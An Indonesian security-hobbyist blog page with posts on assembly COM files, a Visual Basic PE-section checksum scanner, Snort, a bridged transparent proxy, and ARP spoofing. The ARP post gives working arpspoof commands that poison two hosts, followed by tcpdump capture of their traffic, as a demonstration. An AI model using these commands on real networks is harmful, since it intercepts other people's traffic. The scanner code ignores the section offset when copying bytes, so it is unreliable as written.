Dokumentasi asli ada di www.SROeR.org
"Chapter 1 : Struktur Program COM"
#####################################

Mengapa menggunakan bahasa Assembly?

1. Cepat, Lebih cepat dari compiler lainnya.
2. Lebih dekat dengan bahasa mesin, disebabkan bahasa Assembly dialamatkan
1:1 dengan bahasa mesin.
3. Kode yang dihasilkan lebih kecil dari compiler lainnya.
4. Dapat mengakses hardware lebih luas.

Compiler Assembly sudah banyak tersedia di internet, contohnya TASM (Turbo
Assembler), MASM (Microsoft Assembler), NASM (Netwide Assembler), dan lainlain.
Salah satu bentuk program yang dapat dihasilkan oleh compiler Assembly
adalah file COM. File COM adalah struktur program paling sederhana. Ada
beberapa syarat dalam pembuatan atau penggunaan file COM :

1. Kode dan data program harus tidak lebih besar dari 64 KB.
2. Tidak dapat memesan alamat memori melalui sistem operasi.

Contoh bentuk kode program COM, ketiklah di teks editor yang dapat
menghasilkan file ASCII murni seperti Notepad, vi, atau lainnya. Simpan
dengan nama COBAASM.ASM.
Versi TASM :
----------------------------------
ideal
p386n
model tiny
codeseg
org 100h
jmp start
;tempat data dan subrutin
start:
mov ax, 4c00h
int 21h
end
----------------------------------
Versi MASM :
----------------------------------
.386
.model tiny
.code
org 100h
entry:
jmp start
;tempat data dan subrutin
start:
mov ax, 4c00h
int 21h
end entry
----------------------------------

Compilelah dengan perintah TASM.EXE COBAASM.ASM lalu dikuti dengan perintah
TLINK.EXE /T COBAASM.OBJ jika menggunakan compiler TASM. Untuk compiler MASM
gunakan perintah ML COBAASM.ASM. Jika tak ada error maka akan terlihat
output seperti ini :

E:\PUSHM0~1\TASM3>tasm.exe cobaasm.asm
Turbo Assembler Version 3.0 Copyright (c) 1988, 1991 Borland
International
Assembling file: cobaasm.asm
Error messages: None
Warning messages: None
Passes: 1
Remaining memory: 460k

File yang dihasilkan dari proses kompilasi adalah file OBJ. Untuk merubah
file OBJ ini menjadi sebuah file EXE atau COM kita perlu melakukan "linking"
dengan program linker. Disini kita menggunakan TLINK.exe.

E:\PUSHM0~1\TASM3>tlink.exe /t cobaasm.obj
Turbo Link Version 3.0 Copyright (c) 1987, 1990 Borland International

Argumen /t pada tlink.exe berarti kita ingin membuat file COM dari file .obj
yang dihasilkan oleh compiler. Sedangkan untuk membuat file EXE tidak perlu
mengikutkan argumen /t.
Jalankan program COM tersebut :

E:\PUSHM0~1\TASM3>cobaasm.com

Apa yang terjadi? Tentunya tidak terjadi apa-apa karena kita belum
menuliskan perintah untuk program tersebut. Jadi program cobaasm.com
tersebut hanya diload ke memory lalu terminate dengan sendirinya.
Apa sih arti dari kode-kode diatas? lalu apa perbedaan antara kode yang
ditulis untuk compiler TASM dengan MASM?
berikut adalah penjelasan lengkapnya...

1. Perintah "ideal" berarti kita menggunakan syntax ideal dalam compiler
TASM.
2. Perintah "p386n" atau ".386" berarti kita menggunakan intruksi prosesor
80386.
3. Perintah "model tiny" atau ".tiny" berarti kita ingin menggunakan
format file COM.
4. Perintah "codeseg" atau ".code" adalah awal dari kode program kita.
5. Perintah "org 100h" berarti program kita akan dimulai dari offset 100h.
6. Dalam compiler MASM kita perlu mendeklarasikan entry point untuk
program, disini kita gunakan label "entry:".
Perlu diketahui kalau deklarasi sebuah label : "nama_label:".
7. Program COM selalu diawali dengan "peloncatan" atau "jump" ke awal kode
program. Perintah yang digunakan adalah “jmp" diikuti dengan nama
label, misalnya "start". Bila diperhatikan, diantara perintah "jmp
start" dan label "start" adalah tempat dimana kita bisa deklarasikan
variabel-variabel ataupun data-data yang digunakan dalam program kita.
8. Untuk mengakhiri jalannya program, kita perlu membuat suatu perintah.
Perintah "end" atau "end entry" disini hanya menunjukkan akhir dari
kode program, bukan untuk MENGAKHIRI proses. 2 perintah yang digunakan
adalah :

MOV AX, 4c00h
int 21h

Perintah MOV adalah perintah untuk menyalin isi data atau register ke
suatu register lain. Bentuk umum perintah MOV :

MOV tujuan_salin, asal_salin

Pada perintah diatas kita akan menyalin atau lebih tepatnya "mengisi"
register AX (lebih dikenal dengan register akumulator 16 bit) dengan
bilangan heksa 4c00.
Sedangkan perintah INT 21h berarti kita menjalankan interrupt sistem
dengan fungsi 21h.

ActiveX-DLL with ASP

2007-08-26T00:59:00.001+07:00

How To Make Your Own Anti Virus - Part 2

2007-08-26T00:55:00.000+07:00

Shoutz : All echo|staff, yogyafree|staff, The Killer Team
Myztx, vaganci, ^family_code^, TOMMY, adhietslank, ^rumput_kering^, Hartono, etc.
#e-c-h-o, #yogyafree, #javahack, #koncek, #canda, #canda-ops @DAL.NET
newbie_hacker@yahoogroups.com, yogyafree@yahoogroups.com
IT_CENTER@yahoogroups.com, ProgrammerVB@yahoogroups.com
virus_baru@yahoogroups.com
VB-bego.com, Virology.info, Vbtn.com
IA01 dan 1IA07, Lab MaDas angk. 19/2004 @ Gunadarma University
Dan teman2 serta kerabat2 lain yang tidak bisa disebutkan satu-persatu

Notes : - Penulis TIDAK bertanggung jawab atas penggunaan maupun penyalahgunaan dari artikel ini.
- Tujuan dibuat artikel HANYA untuk BAHAN PEMBELAJARAN saja.
- Penggunaan nama, merek, atau logo hanya sebagai CONTOH dan REFERENSI saja, TIDAK ada maksud
mempromosikan pihak tertentu.
- Penulis mohon maaf apabila seluruh/sebagian dari isi artikel ini sudah tersirat dalam
artikel sejenis lainnya.

Main#
Pada artikel terdahulu penulis sudah membahas tentang bagaimana engine scanner statis bekerja secara umum. Seperti yang
diketahui, scanner statis akan mendeteksi sebuah malware atau thread berdasarkan hasil checksum dari file tersebut. Tetapi
teknik ini tidak akan efesien apabila diterapkan pada malware yang sudah mengimplementasikan teknik polymorph. teknik Polymorph
secara umum adalah teknik mereplikasi diri dan tiap signature replikanya berbeda satu sama lain.
Dalam beberapa kasus virus lokal sudah ditemukan penggunaan teknik polymorph. Baik itu secara sederhana maupun kompleks. Cara
yang biasa digunakan yaitu :

- Merubah atau mengenkripsi nama variabel dan string
- Menambah atau mengurangi byte-byte tertentu dalam diri virus
- Menggunakan engine polymorph tertentu

Untuk kasus yang menggunakan teknik enkripsi, tidak semua jenis enkripsi dapat didekripsi oleh engine Antivirus. Perlu analisa
dengan menggunakan reverse-engineering yang mendalam guna memahami teknik enkripsi yang dipakai.
Pada penulisan berikut akan dijelaskan bagaimana membuat scanner statis yg bisa mengenali thread secara lebih baik dari yang terdahulu
Ada baiknya kita mengenal terlebih dahulu format file PE (Portable Executable) pada Windows.
Format File PE mulai dikenalkan pada Windows NT 3.1, dimana format file ini masih menyimpan header MZ dari MS-DOS. Berikut skema dasar
format file PE :

|----------------------------|
| CodeView Debug Information |
|----------------------------|
| COFF Symbols |
|----------------------------|
| COFF Line Numbers |
|----------------------------|
| Section - n |
| . |
| . |
| Section - 2 |
|----------------------------|
| Section - 1 |
|----------------------------|
| Section - 0 |
|----------------------------|
| Array Section table |
| . |
| . |
| Array Section table |
|----------------------------|
| Data Directory |
|----------------------------|
| |
|----------------------------|
| Image File Header |
|----------------------------|
| "PE\0\0" |
|----------------------------|
| "MZ" |
|----------------------------|

$PE Header
PE Header merupakan salah satu struktur dari IMAGE_NT_HEADER (dideklarasikan dalam WINNT.H). Header ini mengandung berbagai macam jenis
informasi seperti lokasi dan ukuran dari area kode dan data, system operasi yang dipakai, ukuran stack, dan lain-lain.
Header ini juga mengandung MS-DOS stub, yaitu program kecil yang akan menampilkan teks "This program cannot be run in MS-DOS mode." bila
file PE dijalankan di lingkungan yang tidak mendukung Win32. PE Header Terdiri dari struktur :

DWORD Signature;
IMAGE_FILE_HEADER FileHeader;
IMAGE_OPTIONAL_HEADER OptionalHeader;

Dimana Signature adalah teks "PE\0\0". Sedangkan IMAGE_FILE_HEADER berisi struktur :

WORD Machine //Berisi nilai untuk jenis CPU yang dipakai, ex : 0x14d untuk Intel i860
WORD NumberOfSections //Berisi jumlah section yang ada di file PE
DWORD TimeDateStamp //Berisi tanggal kapan linker (atau compiler untuk File OBJ) memproduksi file PE
DWORD PointerToSymbolTable //Offset untuk tabel symbol COFF
DWORD NumberOfSymbols //Berisi jumlah symbol COFF di tabel
WORD SizeOfOptionalHeader //Berisi ukuran dari optional header
WORD Characteristics //Berisi informasi tentang file PE

Untuk IMAGE_OPTIONAL_HEADER berisi :

WORD Magic //Selalu bernilai 0x010B
BYTE MajorLinkerVersion //Versi linker yang dipakai
BYTE MinorLinkerVersion //Versi linker yang dipakai
DWORD SizeOfCode //Ukuran dari section code
DWORD SizeOfInitializedData //Ukuran dari semua data section yang terinisialisasi
DWORD SizeOfUninitializedData //Ukuran dari semua data section yang tidak terinisialisasi
DWORD AddressOfEntryPoint //Alamat dimana loader akan memulai eksekusi file PE, alamat ini adalah RVA (Relative Virtual Address)
DWORD BaseOfCode //Alamat RVA dimana section code dimulai
DWORD BaseOfData //Alamat RVA dimana section data dimulai
DWORD ImageBase //Alamat dimana file PE akan dimapping di memory
DWORD SectionAlignment //Nilai penggandaan untuk mapping tiap section di memory
DWORD FileAlignment //Nilai penggandaan untuk mapping tiap section di disk
WORD MajorOperatingSystemVersion //Versi OS yang dipakai
WORD MinorOperatingSystemVersion //Versi OS yang dipakai
WORD MajorSubsystemVersion //Versi minimum OS yang dipakai
WORD MinorSubsystemVersion //Versi minimum OS yang dipakai
DWORD Reserved1 //Selalu bernilai 0
DWORD SizeOfImage //Ukuran dari image yang akan diload oleh loader
DWORD SizeOfHeaders //Ukuran dari PE Header dan tabel section
DWORD CheckSum //Nilai checksum CRC dari file PE
WORD Subsystem //Tipe subsistem yang diperlukan untuk keperluan GUI
WORD DllCharacteristics //Tanda atau flag untuk inisialisasi DLL (Dynamic Link Library)
DWORD SizeOfStackReserve //Ukuran dari virtual memory yang akan digunakan untuk inisialisasi stack
DWORD SizeOfStackCommit //Ukuran dari memory yang akan digunakan untuk inisialisasi stack
DWORD SizeOfHeapReserve //Ukuran dari virtual memory yang akan digunakan untuk inisialisasi heap proses
DWORD SizeOfHeapCommit //Ukuran dari memory yang akan digunakan untuk inisialisasi heap proses
DWORD LoaderFlags //Digunakan untuk keperluan debugging
DWORD NumberOfRvaAndSizes //Jumlah dari array DataDirectory

$Tabel Section
Secara umum Tabel Section dapat dianalogikan sebagai "daftar" untuk tiap section yang ada di file PE. Tabel ini mencakup informasi
tentang section-section file PE. berikut contoh layout dari tabel section file PE yang sudah di dump :

01 .text VirtSize: 00005AFA VirtAddr: 00001000
raw data offs: 00000400 raw data size: 00005C00
relocation offs: 00000000 relocations: 00000000
line # offs: 00009220 line #'s: 0000020C
characteristics: 60000020
CODE MEM_EXECUTE MEM_READ

02 .bss VirtSize: 00001438 VirtAddr: 00007000
raw data offs: 00000000 raw data size: 00001600
relocation offs: 00000000 relocations: 00000000
line # offs: 00000000 line #'s: 00000000
characteristics: C0000080
UNINITIALIZED_DATA MEM_READ MEM_WRITE

03 .rdata VirtSize: 0000015C VirtAddr: 00009000
raw data offs: 00006000 raw data size: 00000200
relocation offs: 00000000 relocations: 00000000
line # offs: 00000000 line #'s: 00000000
characteristics: 40000040
INITIALIZED_DATA MEM_READ

04 .data VirtSize: 0000239C VirtAddr: 0000A000
raw data offs: 00006200 raw data size: 00002400
relocation offs: 00000000 relocations: 00000000
line # offs: 00000000 line #'s: 00000000
characteristics: C0000040
INITIALIZED_DATA MEM_READ MEM_WRITE

05 .idata VirtSize: 0000033E VirtAddr: 0000D000
raw data offs: 00008600 raw data size: 00000400
relocation offs: 00000000 relocations: 00000000
line # offs: 00000000 line #'s: 00000000
characteristics: C0000040
INITIALIZED_DATA MEM_READ MEM_WRITE

06 .reloc VirtSize: 000006CE VirtAddr: 0000E000
raw data offs: 00008A00 raw data size: 00000800
relocation offs: 00000000 relocations: 00000000
line # offs: 00000000 line #'s: 00000000
characteristics: 42000040
INITIALIZED_DATA MEM_DISCARDABLE MEM_READ

Layout diatas adalah format dari IMAGE_SECTION_HEADER, Berikut keterangan tentang IMAGE_SECTION_HEADER :

BYTE Name[IMAGE_SIZEOF_SHORT_NAME] //Nama section, biasanya diawali dengan tanda titik/dot
union { //Nilai sesungguhnya dari ukuran kode atau data
DWORD PhysicalAddress
DWORD VirtualSize
} Misc;
DWORD VirtualAddress //Alamat RVA untuk keperluan mapping oleh loader
DWORD SizeOfRawData //Ukuran dari section setelah dibulatkan ke ukuran file alignment
DWORD PointerToRawData //Offset dari section
DWORD PointerToRelocations //Offset untuk informasi relokasi section
DWORD PointerToLinenumbers //Offset untuk nomor baris (line number)
WORD NumberOfRelocations //Jumlah dari relokasi yang ada di tabel relokasi
WORD NumberOfLinenumbers //Jumlah dari nomor baris yang ada di tabel nomor baris
DWORD Characteristics //Berisi angka tertentu yang menunjukkan atribut dari suatu section (data, kode, dll)

How to build#
Untuk membangun suatu scanner statis yang dapat memetakan (mapping) dan mengambil sebagian sectionnya utnuk dianalisa
, perlu diketahui terlebih dahulu hal-hal berikut :

- What's section? Berhubung section yang dimiliki oleh suatu file PE beragam jumlah dan isinya, kita perlu mengetahui section
keberapa dan apa isinya sebelum di analisa atau di dump. Pengidentifikasian tiap section dapat dilakukan dengan cara menganalisis
karakteristik file PE tersebut.
- Is it packed/compressed or not? Kadang para pembuat aplikasi perlu memproteksi atau mengecilkan ukuran file PE mereka
dengan cara menggunakan packer/compressor. Hal ini sangat berpengaruh dalam pengidentifikasian section, karena seringkali packer
/compressor membuat section dummy dalam file PE yang dihasilkan.

Bahasa pemograman yang digunakan adalah Visual Basic 6.0. sedangkan Projek yang akan dibuat adalah ActiveX DLL (Dynamic Link Library),
sehingga dapat digunakan oleh aplikasi lain. Referensi tentang File DLL dapat dilihat dibagian akhir artikel ini.
Section yang akan diambil adalah data atau code section, dengan mengasumsikan section tersebut berada di urutan kedua maka Section tersebut
seharusnya memiliki nama ".data". Berikut adalah flowchart sederhana dari DLL yang akan dibuat :

|Start|
|
|
|Input File|
|
|

|y
|
|Mapping tabel section|
|
|

|y
|
|Dapatkan size dan offsetnya|
|
|
|ambil checksum dari byte section tsb|
|
|
|End|

Untuk fungsi pengambilan checksum dapat menggunakan teknik CRC ataupun MD5. Khusus utnuk teknik CRC dapat ditemui pada artikel sebelumnya.
Sedangkan untuk teknik MD5 dapat menggunakan file aamd532.dll yang ada di file projek artikel ini.
Berikut ini adalah contoh sederhana Activex DLLnya :

------------------ START COPy FROM HERE ------------------
'Jenis Projek : Activex DLL
'Nama file Class : Class1.cls

Private Type IMAGEDOSHEADER
e_magic As String * 2
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(1 To 4) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(1 To 10) As Integer
e_lfanew As Long
End Type

Private Type IMAGE_SECTION_HEADER
nameSec As String * 6
PhisicalAddress As Integer
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
Characteristics As Long

End Type

Private Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
Characteristics As Integer
End Type

Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long
size As Long
End Type

Private Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUninitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
Win32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
Subsystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type

Private Type IMAGE_NT_HEADERS
Signature As String * 4
FileHeader As IMAGE_FILE_HEADER
OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type

Private DOSHEADER As IMAGEDOSHEADER
Private NTHEADER As IMAGE_NT_HEADERS
Private SECTIONSHEADER() As IMAGE_SECTION_HEADER
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)

Public Function ReadPE(ByRef DATA() As Byte) As String
On Error GoTo ErrX
Dim CNT As Long
Dim u As Long
Dim dumpSec() As Byte

CopyMemory DOSHEADER, DATA(CNT), Len(DOSHEADER) 'Memulai mapping
If DOSHEADER.e_magic <> "MZ" Then Exit Function 'Periksa apakah DOS Header adalah valid
CopyMemory NTHEADER, DATA(DOSHEADER.e_lfanew), Len(NTHEADER)
CNT = CNT + DOSHEADER.e_lfanew + Len(NTHEADER) 'Offset section pertama
If NTHEADER.Signature <> "PE" & Chr(0) & Chr(0) Then Exit Function 'Periksa apakah file PE adalah valid
ReDim SECTIONSHEADER(NTHEADER.FileHeader.NumberOfSections - 1) 'Array tabel section
For u = 0 To UBound(SECTIONSHEADER) 'Enumerasi tiap section
CopyMemory SECTIONSHEADER(u), DATA(CNT), Len(SECTIONSHEADER(0))
CNT = CNT + Len(SECTIONSHEADER(0)) 'Offset section berikutnya
If SECTIONSHEADER(u).nameSec = ".data" Or u = 1 Then 'Periksa apakah section ke 2 atau bernama .data
POINTERTORAW = SECTIONSHEADER(u).PointerToRawData 'Dapatkan offset section
SIZEOFRAW = SECTIONSHEADER(u).SizeOfRawData 'Dapatkan ukurannya
ReDim dumpSec(SIZEOFRAW - 1)
For i = 0 To SIZEOFRAW - 1
dumpSec(i) = DATA(i) 'Salin array yang mengandung section code
Next
ReadPE = Hex(CRC32(dumpSec(), SIZEOFRAW - 1)) 'Teknik CRC32
GoTo udah
End If
Next u
udah:
Exit Function
ErrX:
On Error GoTo 0
End Function

------------------ STOP COPy FROM HERE ------------------

Dimana DATA() adalah array byte dari file PE yang dibuka. Engine scanner ini perlu ditingkatkan sensitifitas
nya, karena bila terdapat section dummy pada urutan section kedua atau tidak ada section yang bernama .data
maka hasil yang diperoleh akan salah.

Penutup#
Engine scanner statis pada AntiVirus dapat ditingkatkan kinerjanya dengan menambahkan algoritma, fungsi ataupun
prosedur tertentu dalam menganalisa setiap file suspect. Salah satu yang bisa ditambahkan adalah fungsi pengecekan
per section pada file PE. Fungsi ini juga masih rawan dari kesalahan analisa. Diharapkan dengan adanya artikel ini
dapat mengembangkan ataupun memajukan kualitas aplikasi Anti Virus lokal.

Referensi#
Pietrek,Matt; Peering Inside the PE: A Tour of the Win32 Portable Executable File Format; MSDN; 1994
www.allapi.net
www.google.co.id
www.planet-source-code.com

Links#
Projek lengkap dapat didownload di : Projek AV 2, Mirror

NIDS di Linux dengan Snort

2007-08-17T23:02:00.000+07:00

IDS atau Intrusion Detection System itu paan ya? Menurut sejumlah referensi, IDS adalah suatu sistem yang memonitor perubahan-perubahan yang terjadi di sebuah sistem komputer, baik itu perubahan dalam sebuah jaringan maupun dari penggunaan komputer itu sendiri. IDS banyak macamna, antara lain :

1. HIDS, Host based Intrusion Detection System. IDS jenis ini akan memonitor dan menganalisa segala aktifitas yang terjadi dalam satu host tertentu.
2. NIDS, Network Intrusion Detection System. IDS yang ini akan memonitor dan menganalisa semua lalu-lintas paket yang ada di jaringan.
3. PIDS, Protocol-based Untrusion Detection System, nah kalo yang ini biasana ditempatkan di front-end sebuah server. Akan memonitor dan menganalisa semua komunikasi yang terjadi di suatu protokol, misal HTTPS.
4. APIDS, Application Protocol-based Intrusion Detection System. Hampir sama dengan PIDS, hanya saja agak berbeda tempat "nangkringna". Dia akan memonitor dan menganalisa status, perubahan dari suatu aplikasi protokol.
4. Hybrid Intrusion Detection System. Dari namana ajah dah diketahui "gabungan", berarti jenis yang ini adalah gabungan dari jenis2 yang sudah ada.

Yuk kita coba mengimplementasikan NIDS di linux. Disini aq pake box Linux debian etch 2.6.18-4-alpha-generic. Snort adalah salah satu aplikasi NIDS yang ada, Snort yang akan diinstal adalah versi 2.3.3. Oh iya, si Snort ini mempunyai kemampuan untuk mengexport log ke bentuk database, ada beberapa database yang dapat digunakan, kayak MySQL, PostgreSQL, oracle, MSSQL dan odbc. Kali ini kita tidak menggunakan fitur ini :).

Pertama tentuna kita install si Snort, pake perintah apt-get :

debian:~# apt-get install snort

buzz..buzz.. si apt bakal nyari dependencies dari si snort sekalian :). Kalo udah diinstall, nanti akan muncul menu yang menanyakan alamat IP yang akan di monitor ma si Snort. Aq masukin 192.168.1.0/24, buat monitor LAN aq :)

Setelah itu, akan dijalankan si Snort secara otomatis. Buat ngecek dah jalan pa lom, kita cari prosesna :

debian:~# ps -ax | grep snort

2082 ? Ss 0:02 /usr/sbin/snort -m 027 -D -d -l /var/log/snort -u snort -g snort -c /etc/snort/snort.conf -S HOME_NET=[192.168.1.0/24] -i eth3
2321 pts/0 S+ 0:00 grep snort

Yups, si Snort telah berhasil diluncurkan :P hehehhe, secara default si Snort nyimpen logna di /var/log/snort dalam bentuk log tcpdump. Ya kalo pgn dibaca harus pake aplikasi log analisis, ato pake tcpdump juga bisa :)

Apaan sih arti dari argumen2 -D -d -l n dll? -m deklarasi umask, -D berarti Snort berjalan pada mode Daemon, -d berarti Snort akan men-dump layer aplikasi, -l berarti Snort akan menyimpan file log ke lokasi yang ditentukan, -u berarti Snort dijalankan sebagai userid yang ditentukan, -g berarti Snort dijalankan sebagai groupid yang ditentukan, -c berarti si Snort akan menggunakan file konfigurasi yang ditentukan, -S akan mendeklarasikan nilai ke variabel yang ditentukan (n=v), dan -i adalah interface yang akan di"tangkringin" :P

Dalam beberapa kasus si Snort agak bermasalah. Versi yang terbaru saat ini dari www.snort.org adalah versi Snort 2.7.0.1. Aq install di box Debian n Slackware masih ada masalah. Masalahna yaitu si Snort gagal untuk berjalan dgn sukses, hal ini dapat dilihat pada /var/log/syslog :

debian kernel: device eth3 entered promiscuous mode
debian kernel: device eth3 left promiscuous mode

Beberapa thread di forum Snort.org juga menunjukkan hal ini. Tapi sampai saat ini aq juga lom tau kenapa :(.

Bikin Bridge + transparent Proxy di Debian Etch arc ALPHA

2007-07-29T20:03:00.001+07:00

Apa sih "Bridge" itu? menurut kamus sih artina jembatan, yups, bridge dalam istilah jaringan/network adalah menghubungkan 2 atau lebih kartu interface network (NIC) layakna sebuah switch. Jadi kalo PC kita dijadikan Brdige, maka PC tsb akan bertingkah laku seperti switch. Apa aja yang bisa dilakuin dengan PC yang dijadikan bridge pada suatu jaringan/network? Banyaaaakkkk sekali, contohna kita bisa bikin transparent firewall, transparent proxy, dll. Kali ini kita akan bikin PC Bridge + transparent proxy dengan Squid 2.6.STABLE14.

Untuk membuat bridge aq pake Linux debian 2.6.18-4-alpha-generic, jgn lupa kalo pake linux dengan kernel 2.4 harus di patch duluw. Package yang diperluin adalah ebtables, iptables dan bridge-utils. Kalo gk mo susah2, tinggal pake apt-get :

debian:~# apt-get install iptables ebtables bridge-utils

setelah diinstall, mari kita coba jalanin si ebtables :

debian:~# ebtables
ebtables v2.0.6 (November 2003)
....

hehhehe dah bisa tuh si ebtablesna, sekarang kita konfigurasi buat bridgena. Jgn lupa, bridge memerlukan 2 atau lebih NIC yang terpasang di PC. Kita akan menghubungkan 2 segmen network dgn skema :

modem internet (192.168.1.1) ===[eth0] bridge [eth1]=== LAN (192.168.1.x)

Kita buat duluw interface buat si bridge :

debian:~# brctl addbr br0

tyus kita buat si eth0 dan eth1 tidak memiliki IP address :

debian:~# ifconfig eth0 0.0.0.0 promisc up
debian:~# ifconfig eth1 0.0.0.0 promisc up

Wew, promisc apaan nuh? promiscuous adalah mode dimana NIC akan mendengarkan dan menerima semua jenis frame yang masuk kedalamnya. Hal ini penting karena si bridge perlu mendegarkan semua frame yang akan masuk. Setelah itu kita tambahin si eth0 n eht1 ke interface br0 :

debian:~# brctl addif br0 eth0
debian:~# brctl addif br0 eth1

Mari kita UP si br0 :

debian:~# ip link set br0 up

Hehehehe, lalu gimana kita ingin akses PC bridge ini secara remote? Untuk itu kita tambahin IP buat si br0 :

debian:~# ip addr add 192.168.1.254/24 brd + dev br0

Jangan lupa tambahin gateway buat si br0 biar gk bingung nyari "gerbang keluar" :

debian:~# route add default gw 192.168.1.1 dev br0

Taraaaaaaaa hampir selese nih, sebenarna kalo buat bridge ajah dah selese ampe sini, berhubung pgn dijadiin transparent proxy juga maka harus di set juga si Squidna :P. Package yang diperluin buat si proxy : Squid. Package ini banyak dependeciesna, jadi mendingan lsg pake apt ajah :

debian:~# apt-get install squid

File konfigurasi squid ada di /etc/squid/squid.conf, edit file ini nih soalna penting. Yang harus diperhatikan adalah penambahan baris sbb :

http_port 3128 transparent
acl lan src 192.168.1.0/24
http_access allow lan

Restart si Squid :

debian:~# /etc/init.d/squid restart

Kalo gk da error, maka si squid dah jalan sebagai transparent proxy :). Nah sekarang tinggal kita redirect koneksi HTTP (port 80) ke squid (port 3128). Kita gunain si ebtables n iptables :

debian:~# ebtables -t broute -A BROUTING -p IPv4 --ip-protocol 6 --ip-destination-port 80 -j redirect --redirect-target ACCEPT
debian:~# iptables -t nat -A PREROUTING -i br0 -p tcp --dport 80 -j REDIRECT --to-port 3128

Untuk percobaan, konekin kabel ethernet LAN ke eth1 n modem internet ke eth0. Buka browser (tidak perlu setting proxy di browser, karena sudah mode transparent :)), n coba buka oms google. Kalo gk da masalah, maka bridge + transparent proxy sukses diimplementasikan :) :)

ARP Spoofing n Sniffing

2007-07-25T22:29:00.000+07:00

Address Resolution Protocol (ARP) adalah protokol untuk mapping dari alamat IP (Internet Protocol) ke alamat fisik MAC (Media Access Control). Misal di suatu jaringan kita ingin mengirim paket ke host A 192.168.1.2, maka pertama kita harus tau sapa yg mempunyai alamat IP tsb. Maka ARP akan membroadcast pertanyaan tsb ke semua host yang ada di jaringan. Sang empunya alamat IP tsb akan menjawab kembali sahutan tsb dengan mengirimkan alamat MACnya. Alamat MAC ini akan disimpan di tabel ARP untuk memudahkan pencarian jika diperlukan pengiriman paket ke tujuan yang sama.

Kayak gimana sih bentuk format frame ARP? Terdiri dari 2 bagian, yaitu header ethernet dan paket ARP. Header ethernet berupa :
- 6 byte alamat tujuan
- 6 byte alamat pengirim
- 2 byte jenis frame ARP

Sedangkan paket ARPna berupa :
- 2 byte jenis alamat hardware (1 = ethernet)
- 2 byte jenis protokol yang di map (0800H = alamat IP)
- 1 byte ukuran alamat hardware
- 1 byte ukuran protokol
- 2 byte tipe operasi (1 = ARP request, 2=ARP reply, 3=*RARP request
,4=RARP reply)
- 6 byte alamat ethernet pengirim
- 4 byte alamat IP pengirim
- 6 byte alamat ethernet penerima
- 4 byte alamat IP penerima

*RARP (Reverse Address Resolution Protocol) digunakan untuk sistem komputer diskless, guna mendapatkan alamat IP mereka saat boot.

ARP Spoofing merupakan suatu kegiatan yang memanipulasi paket ARP. Misal paket X dari komputer A ditujukan untuk komputer B, ketika komputer A membroadcast paket ARP di jaringan, maka komputer C sang manipulator dapat "meracuni" (Posioning) paket ARP tsb agar paket X ditujukan ke komputer C terlebih dahulu baru diforward ke komputer B. Poisoning ini mengganti alamat MAC komputer B dengan alamat MAC komputer C di tabel ARP komputer A dan sebaliknya, alamat MAC komputer A diganti menjadi alamat MAC komputer C di tabel ARP komputer B. Jenis-jenis serangan yang bisa dilakukan dnegan ARP Spoofing diantarana adalah sniffing, Man in the Middle, MAC Flooding, DoS (Denial of Service), Hijacking n Cloning.

Apa ajah sih yg diperluin buat ARP Spoofing ini? Kalo aq sih pake arpspoof yang ada di paket dsniff-2.3 untuk OS Linux. Ohiya, sebelum menginstall dsniff ini perlu dicek apakah di sistem yang digunain dah terinstall libnet ma libnids. Jangan lupa untuk jenis attacking sniffing ato MIM perlu IP Forwarding diaktifkan (echo 1 > /proc/sys/net/ipv4/ip_forward).

Seperti biasa, unpack paket dsniff lalu configure n terakhir make install. Ohiya, pas saat make, aq sempet dapet error compiling module sshcrypto :

sshcrypto.c:30: error: parse error before "des_key_schedule"
....blablabla
....blablabla
*** Error code 1

Solusina kita buka n edit file sshcrypto.c di folder dsniff-2.3, tambahin :

#include <openssl/des.h>
#include <openssl/blowfish.h>

di deklarasi file header yang diperlukan. Bila dah kelar n gak da error lagi, coba jalanin si dsniff ato si arpspoof :)

Yuukk kita coba meracuni n ngendus paket antara komputer A 192.168.1.1 n komputer B 192.168.1.3, komputer C (attacker) 192.168.1.6.

jalanin si arpspoof terlebih dahulu :

root@slack:~# arpspoof -t 192.168.1.1 192.168.1.3 & >/dev/null
root@slack:~# arpspoof -t 192.168.1.3 192.168.1.1 & >/dev/null

kalo dah bener nanti di console akan muncul kayak gini :

0:c:29:3e:2d:46 0:15:e9:b5:83:62 0806 42: arp reply 192.168.1.3 is-at 0:c:29:3e:2d:46
0:e0:29:63:d1:6 0:15:e9:b5:83:62 0806 42: arp reply 192.168.1.3 is-at 0:e0:29:63:d1:6

Setelah itu bisa kita endus pake dsniff ato tcpdump, misal mo pake tcpdump bisa kita capture hasilna ke file, pake :

root@slack:~# tcpdump -i eth0 -w endus.txt

dimana eth0 adalah interface card dan endus.txt adalah nama file outputna :). Kalo file tsb dibuka masi kaco isina >.<, jadi bisa kita liat pake tcpdump juga, pake :

root@slack:~# tcpdump -r endus.txt

